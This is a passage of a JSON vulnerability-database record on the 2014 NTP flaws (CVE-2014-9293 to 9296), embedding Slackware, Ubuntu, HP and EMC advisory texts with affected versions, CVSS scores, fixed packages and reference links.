package:\n32eab67538c33e4669bda9200799a497 ntp-4.2.8-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n33ecf4845fa8533a12a98879815bde08 ntp-4.2.8-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nf2b45a45c846a909ae201176ce359939 ntp-4.2.8-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n12d7ab6e2541af4d1282621d3773e7f7 ntp-4.2.8-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n5b2150cee9840d8bb547098cccde879a n/ntp-4.2.8-i486-1.txz\n\nSlackware x86_64 -current package:\n9ce09c5d6a60d3e2117988e4551e4af1 n/ntp-4.2.8-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. ============================================================================\nUbuntu Security Notice USN-2449-1\nDecember 22, 2014\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. \n\nSoftware Description:\n- ntp: Network Time Protocol daemon and utility programs\n\nDetails:\n\nNeel Mehta discovered that NTP generated weak authentication keys. A remote\nattacker could possibly use this issue to brute force the authentication\nkey and send requests if permitted by IP restrictions. (CVE-2014-9294)\n\nStephen Roettger discovered that NTP contained buffer overflows in the\ncrypto_recv(), ctl_putdata() and configure() functions. The default compiler options for affected releases should reduce the\nvulnerability to a denial of service. In addition, attackers would be\nisolated by the NTP AppArmor profile. (CVE-2014-9295)\n\nStephen Roettger discovered that NTP incorrectly continued processing when\nhandling certain errors. (CVE-2014-9296)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.1\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.1\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.2\n\nUbuntu 10.04 LTS:\n ntp 1:4.2.4p8+dfsg-1ubuntu2.2\n\nAfter a standard system update you need to regenerate any MD5 keys that\nwere manually created with ntp-keygen. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2449-1\n CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.2\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.4p8+dfsg-1ubuntu2.2\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04582466\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04582466\nVersion: 1\n\nHPSBGN03277 rev.1 - HP Virtualization Performance Viewer, Remote Execution of\nCode, Denial of Service (DoS) and\n\nOther Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-03-06\nLast Updated: 2015-03-06\n\nPotential Security Impact: Remote execution of code, Denial of Service (DoS),\nand other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with the NTP service\nthat is present on HP\n\nVirtualization Performance Viewer (vPV). These could be exploited remotely to\nexecute code, create a Denial of\n\nService (DoS), and other vulnerabilities. \n\nReferences:\n\nCVE-2014-9293 - Insufficient Entropy in Pseudo-Random Number Generator (PRNG)\n(CWE-332)\nCVE-2014-9294 - Use of Cryptographically Weak PRNG (CWE-338)\nCVE-2014-9295 - Stack Buffer Overflow (CWE-121)\nCVE-2014-9296 - Error Conditions, Return Values, Status Codes (CWE-389)\nSSRT101957\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Virtualization Performance Viewer v2.10, v2.01, v2.0, v1.X\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following information to mitigate the impact of these\nvulnerabilities. \n\nhttps://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea\nrch/document/KM01411809?/\n\nHISTORY\nVersion:1 (rev.1) - 6 March 2015 Initial release\n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-\n\nalert@hp.com\nIt is strongly recommended that security related information being\ncommunicated to HP be encrypted using PGP,\n\nespecially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n To: security-alert@hp.com\n Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins\nvia Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\n\u0026jumpid=in_SC-\n\nGEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n - verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile\nto update appropriate sections. \n\nTo review previously published Security Bulletins visit:\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin relates to is\nrepresented by the 5th and 6th\n\ncharacters of the Bulletin number in the title: GN = HP General SW\n MA = HP Management Agents\n MI = Misc. 3rd Party SW\n\nMP = HP MPE/iX\n NS = HP NonStop Servers\n OV = HP OpenVMS\n\nPI = HP Printing \u0026 Imaging\n ST = HP Storage SW\n TL = HP Trusted Linux\n\nTU = HP Tru64 UNIX\n UX = HP-UX\n VV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to\nmaintain system integrity. HP is\n\ncontinually reviewing and enhancing the security features of software\nproducts to provide customers with current\n\nsecure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the\nattention of users of the affected\n\nHP products the important security information contained in this Bulletin. HP\nrecommends that all users\n\ndetermine the applicability of this information to their individual\nsituations and take appropriate action. HP\n\ndoes not warrant that this information is necessarily accurate or complete\nfor all user situations and,\n\nconsequently, HP will not be responsible for any damages resulting from\nuser\u0027s use or disregard of the\n\ninformation provided in this Bulletin. To the extent permitted by law, HP\ndisclaims all warranties, either\n\nexpress or implied, including the warranties of merchantability and fitness\nfor a particular purpose, title and\n\nnon-infringement.\"\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The\n\ninformation provided is provided \"as is\" without warranty of any kind. To the\nextent permitted by law, neither\n\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental, special or consequential\n\ndamages including downtime cost; lost profits; damages relating to the\nprocurement of substitute products or\n\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to\n\nchange without notice. Hewlett-Packard Company and the names of\nHewlett-Packard products referenced herein are\n\ntrademarks of Hewlett-Packard Company in the United States and other\ncountries. Other product and company names\n\nmentioned herein may be trademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlT6CWUACgkQ4B86/C0qfVk6XQCg6QDwe+ba3WDTOzIDQg4Pxs9V\n3ZMAn3DdFKuMO7w/MMmSc+DGUzK+zvUh\n=JNjz\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nESA-2015-004: EMC M\u0026R (Watch4Net) Multiple Vulnerabilities \n\nEMC Identifier: ESA-2015-004\n\nCVE Identifier: CVE-2015-0513, CVE-2015-0514, CVE-2015-0515, CVE-2015-0516, CVE-2014-4288, CVE-2014-6456, CVE-2014-6457, CVE-2014-6458, CVE-2014-6466, CVE-2014-6468, CVE-2014-6476, CVE-2014-6485, CVE-2014-6492, CVE-2014-6493, CVE-2014-6502, CVE-2014-6503, CVE-2014-6504, CVE-2014-6506, CVE-2014-6511, CVE-2014-6512, CVE-2014-6513, CVE-2014-6515, CVE-2014-6517, CVE-2014-6519, CVE-2014-6527, CVE-2014-6531, CVE-2014-6532, CVE-2014-6558, CVE-2014-6562, CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296, CVE-2014-3618\n\nSeverity Rating: CVSS v2 Base Score: View details below for individual CVSS score for each CVE\n\nAffected products: \n\\x95\tEMC M\u0026R (Watch4Net) versions prior 6.5u1\n\\x95\tEMC ViPR SRM versions prior to 3.6.1\n\nSummary:\nEMC M\u0026R (Watch4Net) is vulnerable to multiple security vulnerabilities that could be potentially exploited by malicious users to compromise the affected system. EMC ViPR SRM is built on EMC M\u0026R platform and is also affected by these vulnerabilities. \n\nDetails:\nThe vulnerabilities include:\n\\x95\tMultiple Oracle Java Runtime Environment (JRE) Vulnerabilities\nCVE Identifiers: CVE-2014-4288, CVE-2014-6456, CVE-2014-6457, CVE-2014-6458, CVE-2014-6466, CVE-2014-6468, CVE-2014-6476, CVE-2014-6485, CVE-2014-6492, CVE-2014-6493, CVE-2014-6502, CVE-2014-6503, CVE-2014-6504, CVE-2014-6506, CVE-2014-6511, CVE-2014-6512, CVE-2014-6513, CVE-2014-6515, CVE-2014-6517, CVE-2014-6519, CVE-2014-6527, CVE-2014-6531, CVE-2014-6532, CVE-2014-6558, CVE-2014-6562. \n\nOracle JRE contains multiple security vulnerabilities. Oracle JRE has been upgraded to 8.0u25 to address these vulnerabilities. See vendor advisory (http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html#AppendixJAVA) for more details. \nCVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the individual CVSS scores for each CVE listed above. \n\n\\x95\tMultiple Cross-Site Scripting Vulnerabilities\nCVE Identifier: CVE-2015-0513\nSeveral user-supplied fields in the administrative user interface may be potentially exploited by an authenticated privileged malicious user to conduct cross-site-scripting attacks on other authenticated users of the system. \nCVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\n\n\\x95\tInsecure Cryptographic Storage Vulnerability \nCVE Identifier: CVE-2015-0514\nA malicious non-ViPR SRM user with access to an installation of ViPR SRM and knowledge of internal encryption methods could potentially decrypt credentials used for data center discovery. \nCVSS v2 Base Score: 5.7 (AV:A/AC:M/Au:N/C:C/I:N/A:N)\n\n\\x95\tUnrestricted File Upload Vulnerability \nCVE Identifier: CVE-2015-0515\nThis vulnerability may potentially be exploited by an authenticated, privileged malicious user to upload arbitrary files into the file system via the web interface. \nCVSS v2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)\n\n\\x95\tPath Traversal Vulnerability\nCVE Identifier: CVE-2015-0516\nThis vulnerability may potentially be exploited by an authenticated, privileged malicious user to download arbitrary files from the file system via the web interface by manipulating the directory structure in the URL. \nCVSS v2 Base Score: 6.8 (AV:N/AC:L/Au:S/C:C/I:N/A:N)\n\n\\x95\tSUSE Procmail Heap Overflow Vulnerability \nCVE Identifier: CVE-2014-3618\nProcmail was updated to fix a heap-overflow in procmail\u0027s formail utility when processing specially-crafted email headers. This issue affects only vApp deployments of the affected software. \nCVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the CVSS score. \n\n\\x95\tNTP Multiple Vulnerabilities \nCVE Identifier: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296\nNTP was updated to fix multiple vulnerabilities. See vendor advisory http://support.ntp.org/bin/view/Main/SecurityNotice for more details. These issues affect only vApp deployments of the affected software. \nCVSS v2 Base Score: Please refer to http://nvd.nist.gov/ for the CVSS scores. \n\n\nResolution:\nThe following version contains the resolution to these issues:\n\\x95\tEMC M\u0026R (Watch4Net) 6.5u1 and later\n\\x95\tEMC ViPR SRM 3.6.1 and later\n\nEMC strongly recommends all customers upgrade at the earliest opportunity. \n\nLink to remedies:\nRegistered customers can download upgraded software from support.emc.com at https://support.emc.com/downloads/34247_ViPR-SRM \n \nCredits:\nEMC would like to thank Han Sahin of Securify B.V. (han.sahin@securify.nl) for reporting CVE-2015-0513 and CVE-2015-0514", "sources": [ { "db": "NVD", "id": "CVE-2014-9293" }, { "db": "CERT/CC", "id": "VU#852879" }, { "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "db": "BID", "id": "71761" }, { "db": "BID", "id": "71762" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "131356" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130709" }, { "db": "PACKETSTORM", "id": "130031" } ], "trust": 3.51 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#852879", "trust": 3.3 }, { "db": "NVD", "id": "CVE-2014-9293", "trust": 3.1 }, { "db": "ICS CERT", "id": "ICSA-14-353-01", "trust": 1.1 }, { "db": "BID", "id": "71757", "trust": 1.0 }, { "db": "MCAFEE", "id": "SB10103", "trust": 1.0 }, { "db": "SECUNIA", "id": "62209", "trust": 1.0 }, { "db": "ICS CERT", "id": "ICSA-14-353-01C", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU96605606", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-007350", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-14-353-01A", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10663", "trust": 0.6 }, { "db": "BID", "id": "71761", "trust": 0.3 }, { "db": "BID", "id": "71762", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "129793", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134756", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131356", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129693", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129684", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130709", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130031", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "BID", "id": "71761" }, { "db": "BID", "id": "71762" }, { "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "131356" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "129684" }, { "db": "PACKETSTORM", "id": "130709" }, { "db": "PACKETSTORM", "id": "130031" }, { "db": "NVD", "id": "CVE-2014-9293" } ] }, "id": "VAR-201412-0615", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.37128115 }, "last_update_date": "2024-07-23T19:19:29.659000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "ntp-4.2.2p1-18.0.1.AXS3", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4191\u0026stype=\u0026sproduct=\u0026published=1" }, { "title": "ntp-4.2.6p5-2.0.2.AXS4", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4190\u0026stype=\u0026sproduct=\u0026published=1" }, { "title": "cisco-sa-20141222-ntpd", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "title": "HPSBGN03277 SSRT101957", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04582466" }, { "title": "HPSBPV03266 SSRT101878", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04574882" }, { "title": "NV15-009", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-009.html" }, { "title": "Bug 2665", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2665" }, { "title": "Security Notice", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "title": "Changes for ntpd/ntp_config.c", "trust": 0.8, "url": "http://bk1.ntp.org/ntp-dev/ntpd/ntp_config.c?page=diffs\u0026rev=4b6089c5kxhxqzqocf0dmxnqqsjouw" }, { "title": "Bug 1176032", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176032" }, { "title": "RHSA-2015:0104", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0104.html" }, { "title": "RHSA-2014:2025", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-2025.html" }, { "title": "\u30b5\u30fc\u30d0\u30fb\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u88fd\u54c1 Network Time Protocol daemon (ntpd)\u306e\u8106\u5f31\u6027(CVE-2014-9293\u301c9296)\u306b\u3088\u308b\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/ntpd_cve-2014-9293.html" }, { "title": "cisco-sa-20141222-ntpd", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1127/1127934_cisco-sa-20141222-ntpd-j.html" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007350" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007350" }, { "db": "NVD", "id": "CVE-2014-9293" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://www.kb.cert.org/vuls/id/852879" }, { "trust": 2.4, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "trust": 2.0, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "trust": 1.9, "url": "http://advisories.mageia.org/mgasa-2014-0541.html" }, { "trust": 1.6, "url": "http://lists.ntp.org/pipermail/announce/2014-december/000122.html" }, { "trust": 1.6, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176032" }, { "trust": 1.1, "url": "http://www.ntp.org/downloads.html" }, { "trust": 1.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01" }, { "trust": 1.1, "url": "https://support.apple.com/en-us/ht6601" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293" }, { "trust": 1.0, "url": "http://bk1.ntp.org/ntp-dev/ntpd/ntp_config.c?page=diffs\u0026rev=4b6089c5kxhxqzqocf0dmxnqqsjouw" }, { "trust": 1.0, "url": "http://bugs.ntp.org/show_bug.cgi?id=2665" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142469153211996\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142590659431171\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142853370924302\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=144182594518755\u0026w=2" }, { "trust": 1.0, "url": "http://rhn.redhat.com/errata/rhsa-2014-2025.html" }, { "trust": 1.0, "url": "http://rhn.redhat.com/errata/rhsa-2015-0104.html" }, { "trust": 1.0, "url": "http://secunia.com/advisories/62209" }, { "trust": 1.0, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:003" }, { "trust": 1.0, "url": "http://www.securityfocus.com/bid/71757" }, { "trust": 1.0, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04790232" }, { "trust": 1.0, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04916783" }, { "trust": 1.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10103" }, { "trust": 1.0, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1047-security-advisory-8" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/support/accessrestrictions#section_6.5.2" }, { "trust": 0.8, "url": "http://www.ntp.org/ntpfaq/ntp-s-algo-crypt.htm" }, { "trust": 0.8, "url": "http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html" }, { "trust": 0.8, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/900/sol15936.html" }, { "trust": 0.8, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc" }, { "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-2024.html" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01c" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu96605606/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9293" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9294" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9293" }, { "trust": 0.6, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10663\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.6, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-408044.htm" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574882" }, { "trust": 0.6, "url": "https://downloads.avaya.com/css/p8/documents/101006439" }, { "trust": 0.6, "url": "http://support.citrix.com/article/ctx200355" }, { "trust": 0.6, "url": "http://seclists.org/bugtraq/2015/jan/att-97/esa-2015-004.txt" }, { "trust": 0.6, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:31.ntp.asc" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04582466" }, { "trust": 0.6, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04916783" }, { "trust": 0.6, "url": "http://seclists.org/bugtraq/2015/sep/41" }, { "trust": 0.6, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04554677" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696755" }, { "trust": 0.6, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01a" }, { "trust": 0.6, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory2.asc" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022036" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg1ssrvpoaix71security150210-1549" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696812" }, { "trust": 0.6, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020645" }, { "trust": 0.6, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097490" }, { "trust": 0.6, "url": "http://www.hitachi.co.jp/products/it/server/security/global/info/vulnerable/ntpd_cve-2014-9293.html" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9295" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9296" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_ntp" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101006440" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097113" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698473" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005067" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699578" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097484" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "http://h20565.www2.hp.com/portal/site/hpsc?" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.2" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.1" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2449-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.4p8+dfsg-1ubuntu2.2" }, { "trust": 0.1, "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng" }, { "trust": 0.1, "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do" }, { "trust": 0.1, "url": "https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsea" }, { "trust": 0.1, "url": "http://h30046.www3.hp.com/subsignin.php" }, { "trust": 0.1, "url": "https://support.emc.com/downloads/34247_vipr-srm" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6511" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6558" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html#appendixjava)" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6562" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6517" }, { 